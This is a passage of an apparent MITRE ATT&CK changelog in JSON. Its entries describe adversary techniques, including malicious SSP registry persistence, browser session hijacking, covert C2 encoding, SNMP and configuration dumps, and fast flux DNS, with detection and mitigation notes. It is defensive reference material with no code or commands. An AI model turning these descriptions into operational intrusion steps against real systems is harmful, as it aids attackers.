An adversary may modify these Registry keys to add new SSPs, which will be loaded the next time the system boots, or when the AddSecurityPackage Windows API function is called.(Citation: Graeber 2014)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1547/005", + "external_id": "T1547.005" + }, + { + "source_name": "Graeber 2014", + "description": "Graeber, M. (2014, October). Analysis of Malicious Security Support Provider DLLs. Retrieved March 1, 2017.", + "url": "http://docplayer.net/20839173-Analysis-of-malicious-security-support-provider-dlls.html" + }, + { + "source_name": "Microsoft Configure LSA", + "description": "Microsoft. (2013, July 31). Configuring Additional LSA Protection. Retrieved June 24, 2015.", + "url": "https://technet.microsoft.com/en-us/library/dn408187.aspx" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_data_sources": [ + "Command: Command Execution", + "Module: Module Load", + "Windows Registry: Windows Registry Key Modification" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor the Registry for changes to the SSP Registry keys. Monitor the LSA process for DLL loads. Windows 8.1 and Windows Server 2012 R2 may generate events when unsigned SSP DLLs try to load into the LSA by setting the Registry key HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\LSASS.exe with AuditLevel = 8. 
(Citation: Graeber 2014) (Citation: Microsoft Configure LSA)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:46:38.641000+00:00\", \"old_value\": \"2025-04-15 19:58:30.225000+00:00\"}}}", + "previous_version": "1.1", + "changelog_mitigations": { + "shared": [ + "M1025: Privileged Process Integrity" + ], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [ + "DS0011: Module (Module Load)", + "DS0017: Command (Command Execution)", + "DS0024: Windows Registry (Windows Registry Key Modification)" + ], + "new": [], + "dropped": [] + } + }, + { + "type": "attack-pattern", + "id": "attack-pattern--544b0346-29ad-41e1-a808-501bb4193f47", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2018-01-16 16:13:52.465000+00:00", + "modified": "2025-04-25 15:15:33.428000+00:00", + "name": "Browser Session Hijacking", + "description": "Adversaries may take advantage of security vulnerabilities and inherent functionality in browser software to change content, modify user-behaviors, and intercept information as part of various browser session hijacking techniques.(Citation: Wikipedia Man in the Browser)\n\nA specific example is when an adversary injects software into a browser that allows them to inherit cookies, HTTP sessions, and SSL client certificates of a user then use the browser as a way to pivot into an authenticated intranet.(Citation: Cobalt Strike Browser Pivot)(Citation: ICEBRG Chrome Extensions) Executing browser-based behaviors such as pivoting may require specific process permissions, such as SeDebugPrivilege and/or high-integrity/administrator rights.\n\nAnother 
example involves pivoting browser traffic from the adversary's browser through the user's browser by setting up a proxy which will redirect web traffic. This does not alter the user's traffic in any way, and the proxy connection can be severed as soon as the browser is closed. The adversary assumes the security context of whichever browser process the proxy is injected into. Browsers typically create a new process for each tab that is opened and permissions and certificates are separated accordingly. With these permissions, an adversary could potentially browse to any resource on an intranet, such as [Sharepoint](https://attack.mitre.org/techniques/T1213/002) or webmail, that is accessible through the browser and which the browser has sufficient permissions. Browser pivoting may also bypass security provided by 2-factor authentication.(Citation: cobaltstrike manual)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "collection" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1185", + "external_id": "T1185" + }, + { + "source_name": "Wikipedia Man in the Browser", + "description": "Wikipedia. (2017, October 28). Man-in-the-browser. Retrieved January 10, 2018.", + "url": "https://en.wikipedia.org/wiki/Man-in-the-browser" + }, + { + "source_name": "Cobalt Strike Browser Pivot", + "description": "Mudge, R. (n.d.). Browser Pivoting. Retrieved January 10, 2018.", + "url": "https://www.cobaltstrike.com/help-browser-pivoting" + }, + { + "source_name": "ICEBRG Chrome Extensions", + "description": "De Tore, M., Warner, J. (2018, January 15). MALICIOUS CHROME EXTENSIONS ENABLE CRIMINALS TO IMPACT OVER HALF A MILLION USERS AND GLOBAL BUSINESSES. 
Retrieved January 17, 2018.", + "url": "https://www.icebrg.io/blog/malicious-chrome-extensions-enable-criminals-to-impact-over-half-a-million-users-and-global-businesses" + }, + { + "source_name": "cobaltstrike manual", + "description": "Strategic Cyber LLC. (2017, March 14). Cobalt Strike Manual. Retrieved May 24, 2017.", + "url": "https://web.archive.org/web/20210825130434/https://cobaltstrike.com/downloads/csmanual38.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Justin Warner, ICEBRG" + ], + "x_mitre_data_sources": [ + "Process: Process Modification", + "Process: Process Access", + "Logon Session: Logon Session Creation" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "This may be a difficult technique to detect because adversary traffic may be masked by normal user traffic. New processes may not be created and no additional software dropped to disk. Authentication logs can be used to audit logins to specific web applications, but determining malicious logins versus benign logins may be difficult if activity matches typical user behavior. 
Monitor for [Process Injection](https://attack.mitre.org/techniques/T1055) against browser applications.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "2.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 15:15:33.428000+00:00\", \"old_value\": \"2025-04-15 19:58:32.147000+00:00\"}}}", + "previous_version": "2.1", + "changelog_mitigations": { + "shared": [ + "M1017: User Training", + "M1018: User Account Management" + ], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [ + "DS0009: Process (Process Access)", + "DS0009: Process (Process Modification)", + "DS0028: Logon Session (Logon Session Creation)" + ], + "new": [], + "dropped": [] + } + }, + { + "type": "attack-pattern", + "id": "attack-pattern--d467bc38-284b-4a00-96ac-125f447799fc", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-03-14 23:39:50.117000+00:00", + "modified": "2025-04-25 14:48:12.613000+00:00", + "name": "Non-Standard Encoding", + "description": "Adversaries may encode data with a non-standard data encoding system to make the content of command and control traffic more difficult to detect. Command and control (C2) information can be encoded using a non-standard data encoding system that diverges from existing protocol specifications. 
Non-standard data encoding schemes may be based on or related to standard data encoding schemes, such as a modified Base64 encoding for the message body of an HTTP request.(Citation: Wikipedia Binary-to-text Encoding) (Citation: Wikipedia Character Encoding) ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "command-and-control" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1132/002", + "external_id": "T1132.002" + }, + { + "source_name": "Wikipedia Binary-to-text Encoding", + "description": "Wikipedia. (2016, December 26). Binary-to-text encoding. Retrieved March 1, 2017.", + "url": "https://en.wikipedia.org/wiki/Binary-to-text_encoding" + }, + { + "source_name": "Wikipedia Character Encoding", + "description": "Wikipedia. (2017, February 19). Character Encoding. Retrieved March 1, 2017.", + "url": "https://en.wikipedia.org/wiki/Character_encoding" + }, + { + "source_name": "University of Birmingham C2", + "description": "Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.", + "url": "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_data_sources": [ + "Network Traffic: Network Traffic Content" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. 
Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows", + "ESXi" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:48:12.613000+00:00\", \"old_value\": \"2025-04-15 19:59:11.823000+00:00\"}}}", + "previous_version": "1.1", + "changelog_mitigations": { + "shared": [ + "M1031: Network Intrusion Prevention" + ], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [ + "DS0029: Network Traffic (Network Traffic Content)" + ], + "new": [], + "dropped": [] + } + }, + { + "type": "attack-pattern", + "id": "attack-pattern--eec23884-3fa1-4d8a-ac50-6f104d51e235", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-03-15 00:37:58.963000+00:00", + "modified": "2025-04-25 14:48:29.907000+00:00", + "name": "Steganography", + "description": "Adversaries may use steganographic techniques to hide command and control traffic to make detection efforts more difficult. Steganographic techniques can be used to hide data in digital messages that are transferred between systems. This hidden information can be used for command and control of compromised systems. In some cases, the passing of files embedded using steganography, such as image or document files, can be used for command and control. 
", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "command-and-control" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1001/002", + "external_id": "T1001.002" + }, + { + "source_name": "University of Birmingham C2", + "description": "Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.", + "url": "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_data_sources": [ + "Network Traffic: Network Traffic Content" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. 
Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows", + "ESXi" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:48:29.907000+00:00\", \"old_value\": \"2025-04-15 19:59:20.025000+00:00\"}}}", + "previous_version": "1.1", + "changelog_mitigations": { + "shared": [ + "M1031: Network Intrusion Prevention" + ], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [ + "DS0029: Network Traffic (Network Traffic Content)" + ], + "new": [], + "dropped": [] + } + }, + { + "type": "attack-pattern", + "id": "attack-pattern--52759bf1-fe12-4052-ace6-c5b0cf7dd7fd", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-10-20 00:08:21.745000+00:00", + "modified": "2025-04-25 14:46:40.804000+00:00", + "name": "Network Device Configuration Dump", + "description": "Adversaries may access network configuration files to collect sensitive data about the device and the network. The network configuration is a file containing parameters that determine the operation of the device. The device typically stores an in-memory copy of the configuration while operating, and a separate configuration on non-volatile storage to load after device reset. 
Adversaries can inspect the configuration files to reveal information about the target network and its layout, the network device and its software, or identifying legitimate accounts and credentials for later use.\n\nAdversaries can use common management tools and protocols, such as Simple Network Management Protocol (SNMP) and Smart Install (SMI), to access network configuration files.(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)(Citation: Cisco Blog Legacy Device Attacks) These tools may be used to query specific data from a configuration repository or configure the device to export the configuration for later analysis. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "collection" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1602/002", + "external_id": "T1602.002" + }, + { + "source_name": "US-CERT TA18-106A Network Infrastructure Devices 2018", + "description": "US-CERT. (2018, April 20). Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices. Retrieved October 19, 2020.", + "url": "https://us-cert.cisa.gov/ncas/alerts/TA18-106A" + }, + { + "source_name": "Cisco Blog Legacy Device Attacks", + "description": "Omar Santos. (2020, October 19). Attackers Continue to Target Legacy Devices. Retrieved October 20, 2020.", + "url": "https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954" + }, + { + "source_name": "US-CERT TA18-068A 2018", + "description": "US-CERT. (2018, March 27). TA18-068A Brute Force Attacks Conducted by Cyber Actors. 
Retrieved October 2, 2019.", + "url": "https://www.us-cert.gov/ncas/alerts/TA18-086A" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_data_sources": [ + "Network Traffic: Network Connection Creation", + "Network Traffic: Network Traffic Content" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Identify network traffic sent or received by untrusted hosts or networks. Configure signatures to identify strings that may be found in a network device configuration.(Citation: US-CERT TA18-068A 2018)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Network Devices" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:46:40.804000+00:00\", \"old_value\": \"2025-04-15 19:58:31.045000+00:00\"}}}", + "previous_version": "1.1", + "changelog_mitigations": { + "shared": [ + "M1030: Network Segmentation", + "M1031: Network Intrusion Prevention", + "M1037: Filter Network Traffic", + "M1041: Encrypt Sensitive Information", + "M1051: Update Software", + "M1054: Software Configuration" + ], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [ + "DS0029: Network Traffic (Network Connection Creation)", + "DS0029: Network Traffic (Network Traffic Content)" + ], + "new": [], + "dropped": [] + } + }, + { + "type": "attack-pattern", + "id": "attack-pattern--ee7ff928-801c-4f34-8a99-3df965e581a5", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-10-19 23:51:05.953000+00:00", + "modified": "2025-04-25 14:48:29.549000+00:00", + "name": "SNMP (MIB Dump)", + "description": "Adversaries may target the Management Information Base (MIB) to 
collect and/or mine valuable information in a network managed using Simple Network Management Protocol (SNMP).\n\nThe MIB is a configuration repository that stores variable information accessible via SNMP in the form of object identifiers (OID). Each OID identifies a variable that can be read or set and permits active management tasks, such as configuration changes, through remote modification of these variables. SNMP can give administrators great insight in their systems, such as, system information, description of hardware, physical location, and software packages(Citation: SANS Information Security Reading Room Securing SNMP Securing SNMP). The MIB may also contain device operational information, including running configuration, routing table, and interface details.\n\nAdversaries may use SNMP queries to collect MIB content directly from SNMP-managed devices in order to collect network information that allows the adversary to build network maps and facilitate future targeted exploitation.(Citation: US-CERT-TA18-106A)(Citation: Cisco Blog Legacy Device Attacks) ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "collection" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1602/001", + "external_id": "T1602.001" + }, + { + "source_name": "SANS Information Security Reading Room Securing SNMP Securing SNMP", + "description": "Michael Stump. (2003). Information Security Reading Room Securing SNMP: A Look atNet-SNMP (SNMPv3). Retrieved October 19, 2020.", + "url": "https://www.sans.org/reading-room/whitepapers/networkdevs/securing-snmp-net-snmp-snmpv3-1051" + }, + { + "source_name": "US-CERT-TA18-106A", + "description": "US-CERT. (2018, April 20). Alert (TA18-106A) Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices. 
Retrieved October 19, 2020.", + "url": "https://www.us-cert.gov/ncas/alerts/TA18-106A" + }, + { + "source_name": "Cisco Blog Legacy Device Attacks", + "description": "Omar Santos. (2020, October 19). Attackers Continue to Target Legacy Devices. Retrieved October 20, 2020.", + "url": "https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954" + }, + { + "source_name": "Cisco Advisory SNMP v3 Authentication Vulnerabilities", + "description": "Cisco. (2008, June 10). Identifying and Mitigating Exploitation of the SNMP Version 3 Authentication Vulnerabilities. Retrieved October 19, 2020.", + "url": "https://tools.cisco.com/security/center/content/CiscoAppliedMitigationBulletin/cisco-amb-20080610-SNMPv3" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_data_sources": [ + "Network Traffic: Network Connection Creation", + "Network Traffic: Network Traffic Content" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Identify network traffic sent or received by untrusted hosts or networks that expose MIB content or use unauthorized protocols.(Citation: Cisco Advisory SNMP v3 Authentication Vulnerabilities)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Network Devices" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:48:29.549000+00:00\", \"old_value\": \"2025-04-15 19:59:19.943000+00:00\"}}}", + "previous_version": "1.1", + "changelog_mitigations": { + "shared": [ + "M1030: Network Segmentation", + "M1031: Network Intrusion Prevention", + "M1037: Filter Network Traffic", + "M1041: Encrypt Sensitive Information", + "M1051: 
Update Software", + "M1054: Software Configuration" + ], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [ + "DS0029: Network Traffic (Network Connection Creation)", + "DS0029: Network Traffic (Network Traffic Content)" + ], + "new": [], + "dropped": [] + } + }, + { + "type": "attack-pattern", + "id": "attack-pattern--5909f20f-3c39-4795-be06-ef1ea40d350b", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2019-04-08 17:51:41.390000+00:00", + "modified": "2025-04-25 15:15:35.374000+00:00", + "name": "Defacement", + "description": "Adversaries may modify visual content available internally or externally to an enterprise network, thus affecting the integrity of the original content. Reasons for [Defacement](https://attack.mitre.org/techniques/T1491) include delivering messaging, intimidation, or claiming (possibly false) credit for an intrusion. Disturbing or offensive images may be used as a part of [Defacement](https://attack.mitre.org/techniques/T1491) in order to cause user discomfort, or to pressure compliance with accompanying messages. \n", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "impact" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1491", + "external_id": "T1491" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_data_sources": [ + "Network Traffic: Network Traffic Content", + "File: File Creation", + "Application Log: Application Log Content", + "File: File Modification" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor internal and external websites for unplanned content changes. Monitor application logs for abnormal behavior that may indicate attempted or successful exploitation. 
Use deep packet inspection to look for artifacts of common exploit traffic, such as SQL injection. Web Application Firewalls may detect improper inputs attempting exploitation.\n\n", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_impact_type": [ + "Integrity" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "IaaS", + "Linux", + "macOS", + "ESXi" + ], + "x_mitre_version": "1.4", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 15:15:35.374000+00:00\", \"old_value\": \"2025-04-15 19:58:33.958000+00:00\"}}}", + "previous_version": "1.4", + "changelog_mitigations": { + "shared": [ + "M1053: Data Backup" + ], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [ + "DS0015: Application Log (Application Log Content)", + "DS0022: File (File Creation)", + "DS0022: File (File Modification)", + "DS0029: Network Traffic (Network Traffic Content)" + ], + "new": [], + "dropped": [] + } + }, + { + "type": "attack-pattern", + "id": "attack-pattern--7bd9c723-2f78-4309-82c5-47cad406572b", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-03-10 17:28:11.747000+00:00", + "modified": "2025-04-25 15:15:46.359000+00:00", + "name": "Dynamic Resolution", + "description": "Adversaries may dynamically establish connections to command and control infrastructure to evade common detections and remediations. This may be achieved by using malware that shares a common algorithm with the infrastructure the adversary uses to receive the malware's communications. 
These calculations can be used to dynamically adjust parameters such as the domain name, IP address, or port number the malware uses for command and control.\n\nAdversaries may use dynamic resolution for the purpose of [Fallback Channels](https://attack.mitre.org/techniques/T1008). When contact is lost with the primary command and control server malware may employ dynamic resolution as a means to reestablishing command and control.(Citation: Talos CCleanup 2017)(Citation: FireEye POSHSPY April 2017)(Citation: ESET Sednit 2017 Activity)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "command-and-control" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1568", + "external_id": "T1568" + }, + { + "source_name": "Talos CCleanup 2017", + "description": "Brumaghin, E. et al. (2017, September 18). CCleanup: A Vast Number of Machines at Risk. Retrieved March 9, 2018.", + "url": "http://blog.talosintelligence.com/2017/09/avast-distributes-malware.html" + }, + { + "source_name": "FireEye POSHSPY April 2017", + "description": "Dunwoody, M.. (2017, April 3). Dissecting One of APT29\u2019s Fileless WMI and PowerShell Backdoors (POSHSPY). Retrieved April 5, 2017.", + "url": "https://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.html" + }, + { + "source_name": "ESET Sednit 2017 Activity", + "description": "ESET. (2017, December 21). Sednit update: How Fancy Bear Spent the Year. Retrieved February 18, 2019.", + "url": "https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/" + }, + { + "source_name": "Data Driven Security DGA", + "description": "Jacobs, J. (2014, October 2). Building a DGA Classifier: Part 2, Feature Engineering. 
Retrieved February 18, 2019.", + "url": "https://datadrivensecurity.info/blog/posts/2014/Oct/dga-part2/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Chris Roffe" + ], + "x_mitre_data_sources": [ + "Network Traffic: Network Connection Creation", + "Network Traffic: Network Traffic Flow", + "Network Traffic: Network Traffic Content" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Detecting dynamically generated C2 can be challenging due to the number of different algorithms, constantly evolving malware families, and the increasing complexity of the algorithms. There are multiple approaches to detecting a pseudo-randomly generated domain name, including using frequency analysis, Markov chains, entropy, proportion of dictionary words, ratio of vowels to other characters, and more (Citation: Data Driven Security DGA). CDN domains may trigger these detections due to the format of their domain names. 
In addition to detecting algorithm generated domains based on the name, another more general approach for detecting a suspicious domain is to check for recently registered names or for rarely visited domains.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows", + "ESXi" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 15:15:46.359000+00:00\", \"old_value\": \"2025-04-15 19:58:44.211000+00:00\"}}}", + "previous_version": "1.1", + "changelog_mitigations": { + "shared": [ + "M1021: Restrict Web-Based Content", + "M1031: Network Intrusion Prevention" + ], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [ + "DS0029: Network Traffic (Network Connection Creation)", + "DS0029: Network Traffic (Network Traffic Content)", + "DS0029: Network Traffic (Network Traffic Flow)" + ], + "new": [], + "dropped": [] + } + }, + { + "type": "attack-pattern", + "id": "attack-pattern--83a766f8-1501-4b3a-a2de-2e2849e8dfc1", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-03-11 14:56:34.154000+00:00", + "modified": "2025-04-25 14:47:18.343000+00:00", + "name": "DNS Calculation", + "description": "Adversaries may perform calculations on addresses returned in DNS results to determine which port and IP address to use for command and control, rather than relying on a predetermined port number or the actual returned IP address. 
A IP and/or port number calculation can be used to bypass egress filtering on a C2 channel.(Citation: Meyers Numbered Panda)\n\nOne implementation of [DNS Calculation](https://attack.mitre.org/techniques/T1568/003) is to take the first three octets of an IP address in a DNS response and use those values to calculate the port for command and control traffic.(Citation: Meyers Numbered Panda)(Citation: Moran 2014)(Citation: Rapid7G20Espionage)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "command-and-control" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1568/003", + "external_id": "T1568.003" + }, + { + "source_name": "Meyers Numbered Panda", + "description": "Meyers, A. (2013, March 29). Whois Numbered Panda. Retrieved January 14, 2016.", + "url": "http://www.crowdstrike.com/blog/whois-numbered-panda/" + }, + { + "source_name": "Moran 2014", + "description": "Moran, N., Oppenheim, M., Engle, S., & Wartell, R.. (2014, September 3). Darwin\u2019s Favorite APT Group [Blog]. Retrieved November 12, 2014.", + "url": "https://www.fireeye.com/blog/threat-research/2014/09/darwins-favorite-apt-group-2.html" + }, + { + "source_name": "Rapid7G20Espionage", + "description": "Rapid7. (2013, August 26). Upcoming G20 Summit Fuels Espionage Operations. Retrieved March 6, 2017.", + "url": "https://blog.rapid7.com/2013/08/26/upcoming-g20-summit-fuels-espionage-operations/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_data_sources": [ + "Network Traffic: Network Traffic Content" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Detection for this technique is difficult because it would require knowledge of the specific implementation of the port calculation algorithm. 
Detection may be possible by analyzing DNS records if the algorithm is known.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows", + "ESXi" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:47:18.343000+00:00\", \"old_value\": \"2025-04-15 19:58:47.388000+00:00\"}}}", + "previous_version": "1.1", + "changelog_mitigations": { + "shared": [], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [ + "DS0029: Network Traffic (Network Traffic Content)" + ], + "new": [], + "dropped": [] + } + }, + { + "type": "attack-pattern", + "id": "attack-pattern--29ba5a15-3b7b-4732-b817-65ea8f6468e6", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-03-11 14:11:16.560000+00:00", + "modified": "2025-04-25 14:46:09.378000+00:00", + "name": "Fast Flux DNS", + "description": "Adversaries may use Fast Flux DNS to hide a command and control channel behind an array of rapidly changing IP addresses linked to a single domain resolution. This technique uses a fully qualified domain name, with multiple IP addresses assigned to it which are swapped with high frequency, using a combination of round robin IP addressing and short Time-To-Live (TTL) for a DNS resource record.(Citation: MehtaFastFluxPt1)(Citation: MehtaFastFluxPt2)(Citation: Fast Flux - Welivesecurity)\n\nThe simplest, \"single-flux\" method, involves registering and de-registering an addresses as part of the DNS A (address) record list for a single DNS name. 
